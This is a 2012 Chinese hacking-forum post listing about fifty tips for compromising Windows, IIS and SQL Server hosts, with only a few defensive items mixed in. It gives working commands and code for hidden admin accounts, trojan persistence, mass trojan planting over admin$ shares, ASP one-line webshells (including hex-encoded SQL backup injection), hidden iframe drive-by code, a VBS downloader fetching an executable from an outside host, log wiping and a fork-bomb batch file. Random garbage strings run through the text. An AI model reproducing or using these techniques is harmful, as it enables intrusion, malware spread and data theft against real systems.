中国网络渗透测试联盟

标题: 一些笔记 [打印本页]

作者: admin    时间: 2012-9-15 14:51
标题: 一些笔记
1、Xp系统修改权限防止病毒或木马等破坏系统,cmd下,& N) z1 P* u1 p$ l  y1 U
cacls C:\windows\system32 /G hqw20:R
' {+ ^+ N0 v0 R# T思是给hqw20这个用户只能读取SYSTEM32目录,但不能进行修改或写入8 ]6 t0 ?6 S. V. p+ w
恢复方法:C:\>cacls C:\windows\system32 /G hqw20:F) \. P0 N0 {9 F3 C, B6 |& |# }
/ T& s! o: Q0 a# s9 z
2、用Microsoft自带的IExpress工具作的捆绑木马可以躲过很多杀毒软件,运行对话框中输入Iexpress。1 |1 x. C3 T+ W( R
2 o3 ~% X+ U! Q7 q4 l' \
3、内网使用灰鸽子,肉鸡上vidcs.exe -p端口,本地VIDCS里,VIDCS服务IP 填肉鸡的IP,VIDCS服务端口,就是给肉鸡开的端口,BINDIP添自己的内网IP,BIND端口 添8000,映射端口添8000。
# q5 I$ b4 b7 [: Y6 ~, {6 Z9 I# H) g* {( B2 R
4、建立隐藏帐号,上次总结了用guest建立隐藏的管理员,这次再介绍一种,在cmd下建立一个ating$的用户,然后注册表下复制管理员的1F4里的F 值到ating$的F值,再把ating$改为$,这样在计算机管理的用户里看不到这个隐藏帐号
5 E! a8 U" U) C4 U9 E. m* A0 o8 a$ {9 Z' ]* X) Q
5、利用INF文件来修改注册表
; k+ F' _! ?: r3 [[Version]
: Q- m  e. m: u8 u- e: mSignature="$CHICAGO$"
/ b  h( ?2 O  v[Defaultinstall]
0 c' b7 t: t2 k+ Y6 R" l5 b* P4 ?addREG=Ating0 p2 f$ h+ M! r) h+ S5 _
[Ating]( g) ?. y- E4 ~  u9 x
HKCU,"Software\Microsoft\Windows\CurrentVersion\Policies\system","disableregistrytools","0x00010001","1"+ G3 [) b' K* {* X' Z# B+ U
以上代码保存为inf格式,注意没有换行符,在命令行里导入inf的命令如下:0 D3 r9 h% Z" g, ?  M  z
rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 inf文件的具体路径7 u' E+ _; k# E; K2 I5 m
其中HKEY_CLASSES_ROOT 简写为 HKCR,HKEY_CURRENT_USER 简写为 HKCU
: G- F( {1 [5 N# {8 a2 b' vHKEY_LOCAL_MACHINE 简写为 HKLM,HKEY_USERS 简写为 HKU
5 j; F% D3 v8 ~6 G5 I  _HKEY_CURRENT_CONFIG 简写为 HKCC
  u) b# T9 q# k9 u( B, Y9 \0x00000000 代表的是 字符串值,0x00010001 代表的是 DWORD值) K; x. N4 M" W2 i: S% z" l
"1"这里代表是写入或删除注册表键值中的具体数据
* B' Z. T* D1 E- ^5 |- e7 ^/ d$ S+ X) ^3 a7 M! c
6、关于制作穿xp2防火墙的radmin,大家一定要会,各大黑客网站都有动画,6 r0 P9 H% ^7 o4 f- i
多了一步就是在防火墙里添加个端口,然后导出其键值- l# R7 l% I$ }/ ~0 }2 J
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]0 W+ n+ h$ X& n

* X; y8 ]3 P7 `2 W1 X9 z3 L1 a7、系统启动时Alerter服务启动前启动木马程序ating.exe,此方法很隐蔽8 D/ y8 g: J: N* v) o" l
在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Image File Execution Options]下建立service.exe项,再在service.exe项建立一个Debugger的键(字符串值),键值填ating.exe的全路径。3 N% {) p; O1 W

, z' I% J" O0 T2 m8、将ftp.exe传到服务器用来提权,可以先把它变成ating.gif格式的再用,迷惑管理员。% N; V" A. U& }

3 r2 @7 Y8 B% v8 {7 ]! l7 V& \3 Z9、有时候在我们进入了网站后台,但是没有上传图片和备份等功能,得不到webshell,
" c6 V4 a5 D, C3 z3 f( s可是不能白来一场,可以看看发表公告或新闻支不支持html和script,支持的话加个frame马或者其他的什么。+ ]1 u3 C% o' R, E- n  e  V

. W) S1 B7 I) y- ?10、用google帮我们找网站后台,搜索”filetype:asp site:www.hack6.com inurl:login”
8 Z" M+ t3 {* _7 @% w4 d9 u( r# v& w7 e
11、我们中了盗密码的木马后不要急于删除,一般这些木马都是把密码发到指定邮箱,我们可以用探嗅软件来找到邮箱的用户名和密码,比如安全焦点的xsniff,7 ]/ u- y8 Q  U7 l5 k- h( k
用法:xsniff –pass –hide –log pass.txt4 m6 J; y$ P0 }% e7 E5 u

* U2 I! ~! M0 Z6 ?  F, g( l4 B  N# A12、google搜索的艺术
+ Z0 z* M/ c$ N1 U$ i9 `5 K搜索关键字:“未闭合的引号”或“ADODB.Field.error”或“Either BOF or EOF in True”
  Y& c$ o! i1 Q' R或“字符串的语法错误”可以找到很多sql注入漏洞。
; t4 @9 W! F6 a. r9 u( }9 S: g7 }; i. }" A( f
13、还可以搜一些木马的关键字,比如搜索“管理登陆 海洋顶端 inurl:asp”,搜到了说明此网站服务器的其中网站肯定有漏洞。* E. O. m& V: \0 K. H

; B4 T/ z1 I# p- B14、cmd中输入 nc –vv –l –p 1987
5 l8 r( h$ r0 u' A" {" ]+ N做个bat文件内容为sqlhello 起始ip 1433 终止ip 1987 扫鸡吃8 s- R2 T/ o2 U' }9 l7 @
! g7 h% h0 @' |6 h  ]8 L: C0 Z
15、制作T++木马,先写个ating.hta文件,内容为
4 l9 d! s+ X, D+ @! y7 y2 h, l<script language="VBScript">
8 ^  `& S1 ~' ^set wshshell=createobject ("wscript.shell" )
$ \1 g+ E& G$ U& Z# n$ aa=wshshell.run("你马的名称",1)
* \3 H3 C1 b- N- w5 Q: O9 c$ Z- J& ^window.close
# \/ |! J. U7 S/ s4 P</script>
0 O- X! B; _9 I再用mshta生成T++木马,命令为mshta ating.hta ating.t++,用网页木马生成器生成网页木马。
" J' Y1 v) l5 a% C( F) f4 C+ g! r
16、搜索栏里输入# d( `6 b7 m; o4 P  `
关键字%'and 1=1 and '%'='  x# a. m9 j# k% G1 `+ w
关键字%'and 1=2 and '%'='
( {) x. H0 \  W$ W! F( [1 R8 d比较不同处 可以作为注入的特征字符' P/ |2 M9 Q$ {- S: \+ E

# _7 f2 s! T* `( R7 k0 T* Y# |3 ?17、挂马代码<html>4 q6 a) d0 o0 `' M0 Q9 B
<iframe src="马的地址" width="0" height="0" frameborder="0"></iframe>' u1 h, R2 @0 Q3 o6 a1 ]' J2 r( P: s
</html>& U2 ]! I9 l* Y* E* c

! g, {" X% @- J6 _8 B18、开启regedt32的SAM的管理员权限检查HKEY_LOCAL_MACHINE\SAM\SAM\和HKEY_LOCAL_MACHINE\SAM\SAM\下的管理员和guest的F键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡, 这方法是简单克隆,
5 ?, i& L5 ~9 N- Y) Dnet localgroup administrators还是可以看出Guest是管理员来。$ h3 t+ K* B( K5 _
& q; F! }4 U/ m7 ^0 r; n9 F, p
19、软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂QQ等* q9 y: L9 m3 a' n; X% C( _5 _0 T
用法: 安装: instsrv.exe 服务名称 路径3 |- B* y* Q, K
卸载: instsrv.exe 服务名称 REMOVE
/ x( U8 q) ~% \: I; U
: m8 m  X8 J/ T4 m
/ z) d( |' Y/ V! x7 d( F6 v' N0 A21、SQL注入时工具---Internet选项---高级里找到显示友好的错误信息勾去掉* ^, N+ P" Z7 {. L; e" m# B
不能注入时要第一时间想到%5c暴库。
9 A- C7 i% q" @6 J! C; ~' D
2 S. m5 o% J: B8 w# V4 f22、很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测,也就是说,他会检测文件是不是有.jpg,那么我们要是把文件改成:ating.jpg.asp试试。。由于还是ASP结尾,所以木马不会变~) o0 ~5 K! P3 I' i8 @8 ~# `0 c( b
0 |7 }/ a: F- X: C% O9 T5 H& W: A
23、缺少xp_cmdshell时
5 z9 m- b7 d% o; ]6 O6 d尝试恢复EXEC sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'! {6 e0 q$ h( f; n, C) e. A9 m
假如恢复不成功,可以尝试直接加用户(针对开3389的); ?9 N" b" K% W/ ]- a% o
declare @o int
7 [& ^: U/ a6 n8 d& _exec sp_oacreate 'wscript.shell',@o out
8 h& Z) R6 ^0 x- r* J& sexec sp_oamethod @o,'run',NULL,'cmd.exe /c net user ating ating /add' 再提到管理员! J5 d$ D: p# e+ n

( p' C# E% V! x' K3 v+ F24.批量种植木马.bat
4 @1 w% O9 F% m( j% e! a$ Gfor /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中
1 o8 {; C) ^, S6 o; a" t5 w+ l' yfor /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间; Y' X) {* b9 ^" K! j  ~% ~
扫描地址.txt里每个主机名一行 用\\开头
" R) V; m- l2 p1 b0 I' f1 G3 p/ q& Y4 L/ ^
25、在程序上传shell过程中,程序不允许包含<% %>标记符号的内容的文件上传,比如蓝屏最小 的asp木马<%execute request("l")%>,我们来把他的标签换一下: <script language=VBScript runat=server>execute request("l")</Script> 保存为.asp,程序照样执行。# S: \! @' p6 ^7 [

8 Y5 o9 K8 a: P; U  x26、IIS6 For Windows 2003 Enterprise Edition 如IIS发布目录文件夹包含.asp后辍名.
, }5 `  D& i6 h, L将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下.
% y  [7 {5 y& V# h- c8 l.cer 等后缀的文件夹下都可以运行任何后缀的asp木马
, o- |& S1 Y0 \" `/ P/ h
) i1 e- S( f, s) s6 E3 d27、telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的IP8 j, l7 x2 |5 x( j6 s
然后用#clear logg和#clear line vty *删除日志
2 Z6 O, b8 a( G8 L3 w% M+ v. @1 M! e
28、电脑坏了省去重新安装系统的方法
/ K- T# x2 o# ?) o; J纯dos下执行,  H5 X6 t# y8 ~
xp:copy C:\WINDOWS\repair\*.* 到 c:\windows\system32\config3 G# v9 T- Z* W2 v
2k: copy C:\winnt\repair\*.* 到 c:\winnt\system32\config; R$ O( |# A+ \8 H

2 x2 X3 d. [& F29、解决TCP/IP筛选 在注册表里有三处,分别是:
: G2 h( n' y! [' y" ?0 jHKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip5 ?3 N0 E, k. K& N* b
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
8 L4 z  V9 c# ?- SHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
* L+ j" L8 B% p$ y) ?+ n1 E分别用( L/ N' s7 o9 f* {
regedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip9 w9 H8 B, u0 p
regedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip. Q$ O0 y- n! s' F: z$ x3 `
regedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip/ ]8 z' `. j1 L2 y+ g6 T
命令来导出注册表项
: A8 `" _6 i: ]$ O+ W然后把三个文件里的EnableSecurityFilters"=dword:00000001,
0 L! U: \% \2 S1 U5 @改成EnableSecurityFilters"=dword:00000000 再将以上三个文件分别用: w; I" h* ~/ A+ Q4 ]% H
regedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg 导入注册表即可。
$ t  |; u; A: `0 T8 F  E% C) M) m7 P' V/ g) O7 l
30、使CHM木马无法在本地运行木马程序 将注册表"HKEY_CURRENT_U
0 p2 Q* u0 C/ H9 g+ s+ RSER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0"下的1004项的值由原来十进制的0改为十六进制的3) Q, N; ?6 c0 B8 ^! ]
: O+ _* I" |5 w& o: u/ [
31、全手工打造开3389工具
( z# o4 R, V, ]( ]0 I1 Q' _+ M打开记事本,编辑内容如下:+ f+ [4 m' ]  y" _5 O
echo [Components] > c:\sql0 F5 X3 J# Q/ i8 O* O( i* f
echo TSEnable = on >> c:\sql8 C1 d/ _: A" J* h% j' X: m
sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q3 q- r/ P4 N' F; P% L! Y1 l1 }/ t
编辑好后存为BAT文件,上传至肉鸡,执行( V9 r% x0 W/ o' l

, r/ Y+ P. h6 {9 D. i0 a32、挂马js代码document.write('<iframe height=0 width=0 src="木马地址.htm"></iframe>');保存到js页面里 可让所有页面挂马; K' A4 B0 Y1 u4 Q- `% `
: m; u1 r0 g& t; d  N
33、让服务器重启
0 T1 c& T3 C/ ?/ @( Y& G. X写个bat死循环:
- [: H" ~, M( K/ b@echo off- b* B" f. E& C! R
:loop1' c. R/ T7 G9 W. W! e
cls
2 M9 `7 Z3 q: R( K  X4 O/ ^2 |start cmd.exe
9 I$ Z7 c+ L8 \, t3 z" m. t$ O  p2 n/ Wgoto loop1  O! [. X# J; D% x1 a: f5 C
保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启& B% y( l* a2 }# Q  Q
6 w4 w$ A0 }) X% g* @& R
34、如果你登录肉鸡的3389时发现有cmd一闪而过,那你可要小心了,管理员写了个bat在监视你,+ Z$ `* V2 Y8 x( R7 N- T+ U
@echo off
; i  ?& }& ~5 [& Ndate /t >c:/3389.txt
+ S% \2 |7 H0 a- qtime /t >>c:/3389.txt
% x0 ?4 g3 Y8 M2 k$ F( K- f) @8 pattrib +s +h c:/3389.bat% B- S" M1 |  G  P1 @; m, y
attrib +s +h c:/3389.txt
4 c& _* x. ?' k( y9 j$ Tnetstat -an |find "ESTABLISHED" |find ":3389" >>c:/3389.txt1 a1 c4 ?6 n+ n' ~* E2 W
并保存为3389.bat
% X; q: Q/ W/ W- \+ `& X打开注册表找到:Userinit这个键值 在末尾加入3389.bat所在的位置,比如我放到C盘,就写:,c:/3389.bat,注意一定要加个逗号
9 w' }6 N% o& d1 M& `6 {2 i5 D. X
: o; N$ p, h3 S% E1 ]4 ]$ o35、有时候提不了权限的话,试试这个命令,在命令行里输入:* X  g! q5 O! B5 K
start http://www.hack520.org/muma.htm然后点执行。(muma.htm是你上传好的漏洞网页): E  k8 ?# |5 q! b) h* }
输入:netstat -an | find "28876" 看看是否成功绑定,如果有就telnet上去,就有了system权限,当然也可以nc连接,本地执行命令。
0 o/ b: U1 J+ F  P+ E8 m  A
0 _8 a& C( x1 m( X' n36、在cmd下用ftp上传马方法,我们可以用echo 写一个批处理文件
7 m6 ~2 Q- r$ s: F. r0 kecho open 你的FTP空间地址 >c:\1.bat //输入你的FTP地址
7 G: j$ q( @) techo 你的FTP账号 >>c:\1.bat //输入账号
$ [. A' h& q5 S& b9 {echo 你的FTP密码 >>c:\1.bat //输入密码
4 S/ `6 z+ C; B* B9 ^1 E7 n. uecho bin >>c:\1.bat //登入
! I1 j: ~" C" P  S9 c0 e" Jecho get 你的木马名 c:\ ating.exe >>c:\1.bat //下载某文件到某地方并改名为什么
! \6 N% y. Z  w' N: q* j: i6 X, uecho bye >>c:\1.bat //退出3 U# N7 J) Z+ }9 `
然后执行ftp -s:c:\1.bat即可5 e8 G0 l. M( N2 g3 w% E3 K

/ ]8 m0 r1 ^0 ^/ c0 m37、修改注册表开3389两法, L$ v8 Q+ r* Y4 s9 }/ z9 B" V
(1)win2000下开终端 首先用ECHO写一个3389.reg文件,然后导入到注册表
5 ^0 i3 B# ~% q" ~/ Zecho Windows Registry Editor Version 5.00 >>3389.reg
& r$ u) K( c5 l# y2 Gecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg
+ e( X  f! \4 a1 zecho "Enabled"="0" >>3389.reg3 Y6 k. P0 b9 Z1 @4 f, `
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
3 Q+ r$ t# P  W# \8 u( j: A. g/ A: ANT\CurrentVersion\Winlogon] >>3389.reg1 m1 Z2 A6 ~: m0 y* K% i* }# C
echo "ShutdownWithoutLogon"="0" >>3389.reg
! R* P9 y# G* a$ |3 q+ oecho [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]& {. \4 ^, w  |. k
>>3389.reg
) U4 w( q) R: ~6 |( A$ e" ~echo "EnableAdminTSRemote"=dword:00000001 >>3389.reg
+ H9 O7 q: P' X9 H/ T- \: j; Fecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]$ e5 P' k. P3 r2 c8 [/ D' f
>>3389.reg, D4 ^: i! A. Q( c# U
echo "TSEnabled"=dword:00000001 >>3389.reg
* k9 ?4 Q& M, g; `echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg& S7 X! z0 U4 u5 m+ r! W
echo "Start"=dword:00000002 >>3389.reg
! q, `0 E, k" i) D; @; y0 R" Vecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]
8 ^+ W4 O" v9 o>>3389.reg
1 O6 {, k9 A- E  _echo "Start"=dword:00000002 >>3389.reg. x, w) n( N1 X( R
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg. {3 G. y( n& H( v6 d; }3 k( u- n
echo "Hotkey"="1" >>3389.reg! @' g/ g& [8 S6 E" y. T6 p& ]
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal" b+ N5 d% d2 S, @7 g
Server\Wds\rdpwd\Tds\tcp] >>3389.reg; f7 Q6 E! b4 k
echo "PortNumber"=dword:00000D3D >>3389.reg! R! Z) s/ R8 {& Y% ~) V
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal3 n3 {* ^3 m' i6 z9 _5 s
Server\WinStations\RDP-Tcp] >>3389.reg  }0 p- _: U# ^' E7 k, w) i
echo "PortNumber"=dword:00000D3D >>3389.reg3 X3 @8 [% I6 `& K3 S
把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件,接着regedit /s 3389.reg导入注册表。5 u1 o* ?! e7 k- l$ t4 z5 ~2 w! H
(如果要改变终端端口只须把上面的两个D3D都改一下就可以了)
, {( g& }( I, }因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效
+ |) A; v. f2 ?! d6 Q7 X/ k(2)winxp和win2003终端开启
  Y/ f$ G8 h8 ?) Y用以下ECHO代码写一个REG文件:; `0 B+ U# B  M* G  O* T% J
echo Windows Registry Editor Version 5.00>>3389.reg
$ ^5 O, O# Y/ b" W3 L! l9 aecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
2 T  y# q; p8 y6 [& Z; sServer]>>3389.reg
' K$ ]" O( I, E4 ]- Yecho "fDenyTSConnections"=dword:00000000>>3389.reg# `2 g4 y9 w1 ^* A" {
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
6 S, D6 R3 r8 B9 T& y' UServer\Wds\rdpwd\Tds\tcp]>>3389.reg
+ j, I$ G6 N" L! m* E+ D- A2 aecho "PortNumber"=dword:00000d3d>>3389.reg
8 t% @1 x9 @2 xecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal6 x5 H" O0 R- ?* W4 v0 y
Server\WinStations\RDP-Tcp]>>3389.reg
  s; o+ i" r8 q' X5 A% M( K, d5 j1 Iecho "PortNumber"=dword:00000d3d>>3389.reg: x4 R; }( i: s* T( h# c8 T) F
然后regedit /s 3389.reg del 3389.reg; R$ C/ b) S3 H6 \: n+ B4 w
XP下不论开终端还是改终端端口都不需重启  Y/ R/ g( _! l! t# J
! g% T) b5 }! u  V$ x3 T- Q2 ^
38、找到SA密码为空的肉鸡一定要第一时间改SA密码,防止别人和我们抢肉吃( W& d  I& l( b- Y8 r0 `
用查询分析器运行 EXEC sp_password NULL, '你要改的密码', 'sa'
! n/ P% U3 J3 R" Y: q6 L1 x. \6 q: {# E& a
39、加强数据库安全 先要声明把mdb改成asp是不能防止下载的!
! E' D  E2 q! m2 f- w# x(1)数据库文件名应复杂并要有特殊字符: E( Z, `7 G5 `
(2)不要把数据库名称写在conn.asp里,要用ODBC数据源$ T$ o# ^& B) v  g5 C
将conn.asp文档中的: V: x% {6 `1 W  f" t/ F# v
DBPath = Server.MapPath("数据库.mdb")
0 }, O6 A+ T- w+ B5 Iconn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath
' m" @3 U% D+ y6 Z  \+ v% S) }
+ t8 |% o7 z: w9 G修改为:conn.open "ODBC数据源名称," 然后指定数据库文件的位置, M/ y1 B7 m5 k* x, N
(3)不放在WEB目录里
0 K- H/ M8 Y% y, m1 a8 A/ n" E" g6 ^6 f# `2 T* L+ K2 @+ B
40、登陆终端后有两个东东很危险,query.exe和tsadmin.exe要Kill掉  L0 p. J+ n  Y2 V1 |8 ?
可以写两个bat文件
2 R3 y* i+ i, s/ ~. Y) m& D@echo off
% ?& x0 u/ d2 g1 O3 \@copy c:\winnt\system32\query.exe c:\winnt\system32\com\1\que.exe- Q. ?0 u$ k+ [/ `& [/ U
@del c:\winnt\system32\query.exe
$ m7 [6 @( y5 A9 N% U@del %SYSTEMROOT%\system32\dllcache\query.exe  Q# G4 f- G3 W9 Y; z$ h
@copy c:\winnt\system32\com\1\query.exe c:\winnt\system32\query.exe //复制一个假的
( h, Y  C7 Z# W5 t/ B/ U- B# c$ e1 Q/ g: m9 Z8 Y
@echo off
5 F/ _2 Q+ ?5 O2 d) F, L@copy c:\winnt\system32\tsadmin.exe c:\winnt\system32\com\1\tsadmin.exe
1 b7 K9 d& R8 r4 S: e4 z@del c:\winnt\system32\tsadmin.exe. b0 L6 S2 G3 }% X
@del %SYSTEMROOT%\system32\dllcache\tsadmin.ex4 j, J7 s# e! M

1 [6 R: x6 ~( B41、映射对方盘符
7 W, N% l+ U4 z$ h" M/ b0 Z& Btelnet到他的机器上,- ^4 S7 o4 ^& f1 R
net share 查看有没有默认共享 如果没有,那么就接着运行& A- D9 Q% j5 w' c# Y
net share c$=c:9 @' E9 i3 |# A' \7 {9 B
net share现在有c$
& v. q7 ^# m# Z, x, K$ z% d在自己的机器上运行9 x1 l. F4 J9 @) P5 d  _
net use k: \\*.*.*.*\c$ 把目标共享映射到本地硬盘,盘符为K
6 \% p0 n6 E$ Y/ t/ L# ?) l
+ n& v- V1 ^2 q8 m9 R2 L42、一些很有用的老知识' b& j6 L" q1 B. r# o$ R" }! N
type c:\boot.ini ( 查看系统版本 )
4 G" P) k$ Y& z6 A6 j5 U, }$ ?9 Xnet start (查看已经启动的服务)
7 {: t& `& c: {: D" ^( dquery user ( 查看当前终端连接 )
5 r6 }- [  r" Inet user ( 查看当前用户 )
7 B: \3 M! x# O  d5 m9 t4 pnet user 用户 密码/add ( 建立账号 )
) a3 T0 m9 J5 B( z4 anet localgroup administrators 用户 /add (提升某用户为管理员)
( I7 ]: P* T  J! _# v2 f( Kipconfig -all ( 查看IP什么的 ): ?' m2 A! r% Y$ E
netstat -an ( 查看当前网络状态 )
( ?$ I, B' |- P4 s' e' `  }findpass 计算机名 管理员名 winlogon的pid (拿到管理员密码)
$ B  N( g! E( U4 y$ g/ \克隆时Administrator对应1F4
$ r1 s; C* O) b' u  Iguest对应1F56 B( u6 P0 g  _6 W0 p, Z/ x
tsinternetuser对应3E8
, Q( U; @' H# G7 o$ v8 z: D# e: a% u
: \# i- V3 N" P" j1 H5 w0 @43、如果对方没开3389,但是装了Remote Administrator Service
7 Y, M5 k' \5 e: n. E) s5 Z: ]用这个命令F:\ftp.exe "regedit -s F:\longyi.biz\RAdmin.reg" 连接5 j3 H. B* ]& _
解释:用serv-u漏洞导入自己配制好的radmin的注册表信息
+ W* `3 k- [9 m0 A/ ]% E先备份对方的F:\ftp.exe "regedit -e F:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin"
) L3 i* H. {$ b+ s$ S* L
  q. ^& O, a) f44、用lcx做内网端口映射,先在肉鸡上监听 lcx -listen 52 8089 (端口自定)
; I% g4 F) r( n0 \1 q本地上运行映射,lcx -slave 鸡的ip 52 我内网的ip 80 (我的WEB是80端口)
+ H4 }; ^6 y; d9 Q+ L
0 ^! f) Y' v& f5 o1 D" g. g8 S45、在服务器写入vbs脚本下载指定文件(比如用nbsi利用注入漏洞写入)
' h. f% s1 f& necho Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open
! j7 C' I! I" x( j9 ^3 i^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s =1 H) e: v8 v- l  L
CreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type =  V3 u  Y( ^  i
1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >ating.vbs
$ T, s: K# K& i* b8 P" u/ X$ n(这是完整的一句话,其中没有换行符)
. Y  L' q- s- q/ f" R6 F% F. C1 M. f4 E然后下载:: ^( d7 f' @% `/ e) ?
cscript down.vbs http://www.hack520.org/hack.exe hack.exe
6 ~  D4 S4 i5 K6 Q1 _# M5 Q, {) Y4 o" E# k( B2 ?, K
46、一句话木马成功依赖于两个条件:' l$ I! W/ |2 H
1、服务端没有禁止adodb.Stream或FSO组件0 _# a. M2 y  e
2、权限问题:如果当前的虚拟目录禁止user级或everyone写入的话也是不会成功的。
0 d/ y' T6 z8 s( c" Z
& `7 B+ m( e! D3 A5 m) c47、利用DB_OWNER权限进行手工备份一句话木马的代码:
) d0 T5 m5 D( @3 I6 J  Z" u3 L;alter database utsz set RECOVERY FULL--% V8 w5 h0 _$ K( q5 l
;create table cmd (a image)--
  c% I1 j, T1 h# G;backup log utsz to disk = 'D:\cmd' with init--8 k! h) U* J- ~+ P; O4 \, G7 Q
;insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--
  ]; l: v3 v5 ]/ y3 I6 l;backup log utsz to disk = 'D:\utsz_web\utsz\hacker.asp'--
1 e0 d6 r0 E- `* u5 Q1 [注:0x3C25657865637574652872657175657374282261222929253EDA为一句话木马的16进制形式。0 q" O$ r7 F7 z9 I2 n& z* R

- P, P+ I* a  z9 K3 J1 J; S48、tlntadmn是telnet服务的设置命令,可以对telnet服务的端口、认证方式等进行设置:. H9 N" s6 h( D; z0 h

* u! @8 _9 B6 j7 a0 I5 e" U. z! T用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options
) v7 c" X8 S, D7 E% z所有会话用 'all'。
0 u" P; h& V0 p* u-s sessionid 列出会话的信息。! W0 p; `; L5 L6 {
-k sessionid 终止会话。
0 r: n# [% o! M- q; x. j  ~-m sessionid 发送消息到会话。1 H- }' c8 F/ ~* [5 N, F
' T2 g0 U& D/ X( V
config 配置 telnet 服务器参数。
4 `' R) e( S8 a5 R) c
. q2 ~  M, M7 P$ G, ?, A0 j& Dcommon_options 为:
% S" \/ }7 }2 D8 f( u3 I-u user 指定要使用其凭据的用户
; F/ ]7 b) X6 t) h; s0 I2 [-p password 用户密码
2 U0 _1 b4 V, B3 c1 I8 e: O
" W) I' J: M" I8 q7 Aconfig_options 为:, x. h) [& g3 ]' |" d: y9 V  i
dom = domain 设定用户的默认域
- y' N4 H7 [# H+ y4 ictrlakeymap = yes|no 设定 ALT 键的映射
+ w2 z4 }8 l, z1 utimeout = hh:mm:ss 设定空闲会话超时值
: b9 N1 O; s! N- V. b& Stimeoutactive = yes|no 启用空闲会话。! u1 n" X) t' |/ J/ b: g, [
maxfail = attempts 设定断开前失败的登录企图数。5 h8 g# v) t7 M5 Z& n* |
maxconn = connections 设定最大连接数。$ @1 P2 f2 h* t5 m0 T$ G( M4 z* x# a8 f
port = number 设定 telnet 端口。" `" }& L0 Y( m( |9 C! N# X
sec = [+/-]NTLM [+/-]passwd
( @9 o' b7 [: K6 p设定身份验证机构
) P) [- X- g! k' Q$ A, l( a8 O& Hfname = file 指定审计文件名。0 O6 w& ~! D+ o2 C6 d
fsize = size 指定审计文件的最大尺寸(MB)。
. j- o3 G# R% E3 N# G) B5 Dmode = console|stream 指定操作模式。/ o# `; s  b( B# D4 I" N
auditlocation = eventlog|file|both
; F* h$ s) K8 |, ?( S) r5 _" i4 w# d指定记录地点" x: Q1 ^& E/ o9 M
audit = [+/-]user [+/-]fail [+/-]admin3 Y+ z8 z* i+ [* j
7 t: C+ u, J4 }
49、例如:在IE上访问:0 g) h! b0 f/ D( y7 E2 Y4 i
www.hack520.org/hack.txt就会跳转到http://www.hack520.org/' V# V+ ~7 Y4 s" C: t! d( d
hack.txt里面的代码是:
- w) a3 R* ~% Y7 F/ m<body> <META HTTP-EQUIV="Refresh" CONTENT="5;URL=http://www.hack520.org/">
+ c" ]7 m: r: j+ b- i9 s; L0 e把这个hack.txt发到你空间就可以了!
# r  `: Y8 O2 C7 M. n这个可以利用来做网马哦!
# e- u3 N" g3 S
; [' [9 a% u6 U6 W50、autorun的病毒可以通过手动限制!& g3 j$ r  z) n% y# R- |
1,养成好习惯,插入U盘或移动硬盘,都要按住shift让其禁止自动运行!+ [% h" L  ^6 M! k0 W# k5 C
2,打开盘符用右键打开!切忌双击盘符~/ _1 Q9 ~# K, J7 s
3,可以利用rar软件查看根目录下autorun病毒并删除之!他可以处理一些连右键都无法打开的分区!
, {/ M7 I6 I% l) q+ @; U# S, Q! i( _; \8 o. s( x; ^
51、log备份时的一句话木马:
+ A1 P- a& p. ?6 }+ W4 ra).<%%25Execute(request("go"))%%25>5 G( {7 e7 T. I6 L) ^9 s
b).<%Execute(request("go"))%>3 n3 Z5 s5 \& X" h
c).%><%execute request("go")%><%+ P, J; Z* }; @
